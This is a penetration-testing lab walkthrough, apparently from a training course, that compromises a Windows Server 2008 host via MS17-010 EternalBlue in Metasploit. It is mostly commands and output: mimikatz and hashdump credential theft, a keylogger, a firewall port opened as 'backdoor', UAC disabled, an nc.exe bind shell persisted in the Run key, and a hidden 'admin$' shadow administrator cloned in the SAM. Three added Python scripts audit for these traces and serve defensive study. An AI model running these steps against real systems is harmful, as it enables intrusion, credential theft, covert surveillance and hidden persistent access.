1 MS17-010 Exploitation
1.1 Problem
1) Find an MS17-010 exploit script
2) Exploit the vulnerability against the Win2008 Server target
- Load the kiwi module to obtain system passwords
- Use hashdump to obtain the password hashes and look them up on an online hash-cracking site
- Migrate the meterpreter process into explorer.exe so the session is not lost when the exploited process exits
- Capture the target host's keyboard input with a keylogger
- Modify the firewall configuration to open TCP port 444
- Disable system UAC
1.2 Steps
This case is carried out in the following steps.
Step one: find an MS17-010 exploit script.
1) Find an MS17-010 exploit script
```
msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
```
2) Scan for the vulnerability with the scanner module
```
msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.145
rhosts => 192.168.10.145
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.10.145:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.145:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Step two: exploit the vulnerability against the Win2008 Server target
1) Run the exploit module against the target
```
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.10.145
rhosts => 192.168.10.145
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.10.136:4444
[*] 192.168.10.145:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.10.145:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.145:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.145:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.10.145:445 - The target is vulnerable.
[*] 192.168.10.145:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.145:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.145:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.145:445 - Connecting to target for exploitation.
[+] 192.168.10.145:445 - Connection established for exploitation.
[+] 192.168.10.145:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.145:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.10.145:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.10.145:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.10.145:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.10.145:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.10.145:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.145:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.145:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.145:445 - Starting non-paged pool grooming
[+] 192.168.10.145:445 - Sending SMBv2 buffers
[+] 192.168.10.145:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.145:445 - Sending final SMBv2 buffers.
[*] 192.168.10.145:445 - Sending last fragment of exploit packet!
[*] 192.168.10.145:445 - Receiving response from exploit packet
[+] 192.168.10.145:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.145:445 - Sending egg to corrupted connection.
[*] 192.168.10.145:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.10.145
[*] Meterpreter session 2 opened (192.168.10.136:4444 -> 192.168.10.145:49489) at 2021-03-22 14:51:44 +0800
[+] 192.168.10.145:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.145:445 - =-=-=-=-=-=-=-=-=-=-=-=-=WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.145:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
```
2) Load the kiwi module to obtain user information
```
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter > help kiwi

Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain          LM                                NTLM                              SHA1
--------       ------          --                                ----                              ----
Administrator  VAGRANT-2008R2  5229b7f52540641daad3b435b51404ee  e02bc503339d51f71d913c245d35b50b  c805f88436bcd9ff534ee86c59ed230437505ecf
sshd_server    VAGRANT-2008R2  e501ddc244ad2c14829b15382fe04c64  8d0a16cfc061c3359db455d00ec27035  94bd2df8ae5cadbbb5757c3be01dd40c27f9362f

wdigest credentials
===================

Username         Domain          Password
--------         ------          --------
(null)           (null)          (null)
Administrator    VAGRANT-2008R2  vagrant
VAGRANT-2008R2$  WORKGROUP       (null)
sshd_server      VAGRANT-2008R2  D@rj33l1ng
```
3) Use hashdump to obtain account information
```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9:::
chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8:::
c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee:::
darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0:::
greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951:::
jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76:::
jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4:::
kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001:::
lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f:::
leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028:::
luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
```
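The hashdump output above is in pwdump format (user:RID:LM:NT:::), and a defender reviewing such a dump looks for three things before anyone bothers with a cracking site: accounts with an empty password (the NT hash of "" is 31d6cfe0d16ae931b73c59d7e0c089c0), accounts that still store a real LM hash rather than the blank placeholder aad3b435b51404eeaad3b435b51404ee, and several accounts sharing one NT hash (password reuse, which in this dump ties the built-in Administrator to the vagrant account). The following parser and audit is an added example, not part of the original lab or of Metasploit; its sample input is a subset of the lines shown above.

```python
"""
Audit pwdump-style hashdump output for weak-credential indicators that a
defender would act on: empty passwords, LM hashes still stored, and the same
NT hash shared by several accounts (password reuse, including reuse of the
built-in Administrator password).
"""
import re
from collections import defaultdict

# Well-known "empty" values: the LM placeholder written when LM storage is
# disabled, and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Sample input: a subset of the hashdump lines shown in the lab output above.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
"""


def parse_pwdump(text):
    """Parse pwdump lines into dicts; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            rows.append({
                "user": m["user"],
                "rid": int(m["rid"]),
                "lm": m["lm"].lower(),
                "nt": m["nt"].lower(),
            })
    return rows


def audit_hashes(rows):
    """Return the three indicator lists, each sorted for stable comparison."""
    findings = {"empty_password": [], "lm_hash_present": [], "shared_nt_hash": []}
    by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            # Expected for a disabled built-in such as Guest; anything else needs review.
            findings["empty_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            # A real LM hash means LM storage is still enabled on the host.
            findings["lm_hash_present"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"].append(sorted(users))
    for key in findings:
        findings[key].sort()
    return findings


if __name__ == "__main__":
    for kind, hits in audit_hashes(parse_pwdump(SAMPLE_HASHDUMP)).items():
        print(f"{kind}: {hits}")
```

Run against the full dump above it reports Guest and sshd as empty-password accounts and Administrator/vagrant as sharing an NT hash, which is the same reuse the wdigest table already shows in clear text. The LM column is blank throughout, so "lm_hash_present" stays empty; on a host that still stores LM hashes that list is the first thing to fix.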
4) Process migration
```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > help ps
Usage: ps [ options ] pattern

Use the command with no arguments to see all running processes.
The following options can be used to filter those results:

OPTIONS:

    -A <opt>  Filter on architecture
    -S <opt>  Filter on process name
    -U <opt>  Filter on user name
    -c        Filter only child processes of the current shell
    -h        Help menu.
    -s        Filter only SYSTEM processes
    -x        Filter for exact matches rather than regex

meterpreter > ps -S explorer
Filtering on 'explorer'

Process List
============

 PID   PPID  Name          Arch  Session  User                          Path
 ---   ----  ----          ----  -------  ----                          ----
 1648  4584  explorer.exe  x64   1        VAGRANT-2008R2\Administrator  C:\Windows\Explorer.EXE

meterpreter > migrate 1648
[*] Migrating from 1052 to 1648...
[*] Migration completed successfully.

meterpreter > getuid
Server username: VAGRANT-2008R2\Administrator
```
5) Capture the target host's keyboard input with the keylogger
```
meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against VAGRANT-2008R2
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20210322151611_default_192.168.10.145_host.windows.key_287595.txt
[*] Recording keystrokes...
^C[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
```
Text typed on the Win2008 keyboard:
Figure 13
The captured input, read back on Kali:
```
┌──(root💀localhost)-[~/桌面]
└─# cat /root/.msf4/loot/20210322151611_default_192.168.10.145_host.windows.key_287595.txt
Keystroke log from explorer.exe on VAGRANT-2008R2 with user VAGRANT-2008R2\Administrator started at 2021-03-22 15:16:11 +0800

hello
world<CR>
welcome
<^S>

Keylog Recorder exited at 2021-03-22 15:16:29 +0800
```
6) Disable the firewall and add a firewall rule
```
meterpreter > shell
Process 3276 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>netsh adcfirewall set allprofiles state off
netsh adcfirewall set allprofiles state off
The following command was not found: adcfirewall set allprofiles state off.

C:\Windows\system32>netsh firewall add portopening TCP 444 backdoor ENABLE ALL
netsh firewall add portopening TCP 444 backdoor ENABLE ALL

IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .

Ok.
```
Check that the firewall rule has been added.
Rule properties:
Figure 14
Firewall rule: protocol and port.
Figure 15
Figure 16
7) Disable User Account Control
```
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
```
Figure 17
2 Planting a Persistent Backdoor
2.1 Problem
Plant a persistent backdoor program.
- Upload the backdoor file
- View the processes started from the registry at boot
- Add nc.exe to the startup entries, listening on TCP port 444
- Connect to the backdoor with nc
2.2 Steps
This case is carried out in the following steps.
Step one: plant the persistent backdoor
1) Upload the backdoor file
```
C:\Windows\system32>exit
exit
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
```
2) View the registry autostart (Run key) entries
```
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (2):
VMware VM3DService Process
VMware User Process
```
3) Add nc.exe to the startup entries, listening on TCP port 444
```
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe"
Successfully set nc of REG_SZ.
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

Values (3):

VMware VM3DService Process
VMware User Process
nc
```
Figure 18
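Both registry changes made so far, the Run value that launches a netcat bind shell (this step) and EnableLUA=0 under Policies\System (section 1, step 7), survive in a plain `reg export` of those keys, so a host-review script can find them without any live tooling. The parser and audit below are an added example, not part of the original lab or of Metasploit; the .reg text is a constructed sample in which the nc value and EnableLUA mirror the page while the two VMware command lines are assumed, since the lab only shows their value names.

```python
"""
Audit a .reg export of the two keys touched in the lab for the persistence
and hardening changes a defender wants to catch: a Run-key autostart that
launches a netcat-style bind shell, and EnableLUA set to 0 (UAC disabled).
"""
import re

# Constructed sample of what `reg export` of the two keys could look like after
# the lab steps. The nc value and EnableLUA=0 mirror the page; the VMware
# command lines are assumed, as the lab only shows their value names.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware VM3DService Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vm3dservice.exe\" -u"
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"
"nc"="C:\\windows\\system32\\nc.exe -Ldp 444 -e cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"""

RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
POLICY_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\policies\system"

# Indicators of a netcat-style listener: the binary name itself, or the
# "execute a program on connect" switch pointing at a shell.
LISTENER_PATTERNS = [
    re.compile(r"\b(nc|nc64|ncat|netcat)\.exe\b", re.IGNORECASE),
    re.compile(r"(^|\s)-e\s+(cmd|powershell)(\.exe)?\b", re.IGNORECASE),
]
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s):
    """Undo .reg escaping: a backslash quotes the character that follows it."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def _decode_value(raw):
    """Decode REG_SZ and REG_DWORD data; other types are returned as-is."""
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return _unescape(raw[1:-1])
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    return raw


def parse_reg_export(text):
    """Return {key_path_lowercase: {value_name: decoded_data}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][_unescape(m.group(1))] = _decode_value(m.group(2))
    return keys


def audit(keys):
    """Return (indicator, value_name, data) tuples for every suspicious entry."""
    findings = []
    for name, data in keys.get(RUN_KEY, {}).items():
        if isinstance(data, str) and any(p.search(data) for p in LISTENER_PATTERNS):
            findings.append(("run-key-bind-shell", name, data))
    if keys.get(POLICY_KEY, {}).get("EnableLUA") == 0:
        findings.append(("uac-disabled", "EnableLUA", 0))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(*finding, sep="\t")
```

The two VMware entries pass because neither pattern matches them; the nc entry trips both the binary-name and the `-e cmd.exe` pattern. Matching on the command line rather than on the value name matters because the value name ("nc" here) is free text an intruder can set to anything.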
4) Connect to the backdoor with nc
```
┌──(root💀localhost)-[~/桌面]
└─# nc 192.168.10.145 444
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::4811:f528:60a8:63e3%11
   IPv4 Address. . . . . . . . . . . : 192.168.10.145
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.2
```
3 Windows Shadow Users
3.1 Problem
1) Add an ordinary user on Win2008
- View the system's current users
- Create a backdoor user whose name ends in "$" and grant it administrator rights
2) Copy the administrator identity information
- Modify the registry permissions to allow access to the "SAM" key
- Copy the administrator identity to the admin$ user
- Export the admin$ user's registry data to a file
3) Create the shadow user and verify it
- Delete the admin$ user
- Import the registry file
3.2 Steps
This case is carried out in the following steps.
Step one: Windows shadow user
1) View the system's current users
```
meterpreter > shell
Process 1404 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            anakin_skywalker         artoo_detoo
ben_kenobi               boba_fett                c_three_pio
chewbacca                darth_vader              greedo
Guest                    han_solo                 jabba_hutt
jarjar_binks             kylo_ren                 lando_calrissian
leia_organa              luke_skywalker           sshd
sshd_server              vagrant
The command completed with one or more errors.
```
2) Create a backdoor user whose name ends in "$" and grant it administrator rights
```
C:\Windows\system32>net user admin$ 123456 /add
net user admin$ 123456 /add
The command completed successfully.


C:\Windows\system32>net localgroup administrators admin$ /add
net localgroup administrators admin$ /add
The command completed successfully.
```
Step two: copy the administrator identity information
1) Modify the registry permissions to allow access to the "SAM" key
```
┌──(root💀localhost)-[~/桌面]
└─# rdesktop -u administrator -p vagrant 192.168.10.145
```
Figure 19
2) Click "Permissions" to modify the permissions
Figure 20
3) Grant the administrators group "Full control"
Figure 21
4) Reopen the registry editor and locate the Users key
Figure 22
5) Locate 000001F4 (administrator), open "F" and copy its contents
Figure 23
6) Open "000003FB", open its "F" value and paste the contents
Figure 24
7) Export the registry information
Figure 25
Figure 26
Figure 27
Step three: create the shadow user and verify it
1) Delete the admin$ user
Figure 28
2) Import the registry file
Figure 29
admin$ is not shown in the Users directory
Figure 30
Not shown among the network users
Figure 31
Not shown in user management
Figure 32
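The verification screenshots above show the point of the technique: the restored account is absent from `net user`, the user-management snap-in and the network user list, yet it still exists in the SAM. That gap is also the detection: a hunt that reads the subkeys of HKLM\SAM\SAM\Domains\Account\Users\Names (as SYSTEM) and compares them with what `net user` reports exposes the account immediately, and a local account name ending in "$" is itself worth flagging on a standalone server. The comparison below is an added example, not part of the original lab; the `net user` text is copied from the page, while the list of SAM name subkeys is a constructed sample that mirrors the `net user` list plus the re-imported admin$.

```python
"""
Hunt for "shadow" local accounts: names present in the SAM but not reported
by `net user`, plus any local account whose name ends in "$".
"""

# Sample 1: the `net user` output from the lab above (copied from the page).
NET_USER_OUTPUT = r"""
User accounts for \\

-------------------------------------------------------------------------------
Administrator            anakin_skywalker         artoo_detoo
ben_kenobi               boba_fett                c_three_pio
chewbacca                darth_vader              greedo
Guest                    han_solo                 jabba_hutt
jarjar_binks             kylo_ren                 lando_calrissian
leia_organa              luke_skywalker           sshd
sshd_server              vagrant
The command completed with one or more errors.
"""

# Sample 2: constructed list of subkeys under
# HKLM\SAM\SAM\Domains\Account\Users\Names as they would be read as SYSTEM
# after the shadow user was re-imported. Everything except "admin$" is assumed
# to mirror the `net user` list.
SAM_NAMES = [
    "Administrator", "Guest", "admin$", "anakin_skywalker", "artoo_detoo",
    "ben_kenobi", "boba_fett", "c_three_pio", "chewbacca", "darth_vader",
    "greedo", "han_solo", "jabba_hutt", "jarjar_binks", "kylo_ren",
    "lando_calrissian", "leia_organa", "luke_skywalker", "sshd",
    "sshd_server", "vagrant",
]


def parse_net_user(output):
    """Collect account names from `net user` output (assumes names contain no spaces)."""
    names, in_table = set(), False
    for line in output.splitlines():
        if line.startswith("-----"):
            in_table = True          # the dashed rule precedes the name columns
            continue
        if line.startswith("The command completed"):
            break                    # trailer line ends the table
        if in_table:
            names.update(line.split())
    return names


def find_shadow_accounts(net_user_names, sam_names):
    """Compare both views of the local account database, case-insensitively."""
    listed = {n.lower() for n in net_user_names}
    hidden = sorted(n for n in sam_names if n.lower() not in listed)
    dollar = sorted(n for n in sam_names if n.endswith("$"))
    return {"in_sam_not_listed": hidden, "dollar_suffixed": dollar}


if __name__ == "__main__":
    print(find_shadow_accounts(parse_net_user(NET_USER_OUTPUT), SAM_NAMES))
```

Reading the SAM directly needs SYSTEM rights on the host, which is exactly why the lab had to loosen the key's permissions first; a hunt script run as SYSTEM does not, and the permission change on the SAM key is a second indicator worth alerting on by itself.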
https://tts.tmooc.cn/ttsPage/NTD/NTDTN202109/PENTEST/DAY03/CASE/01/index.html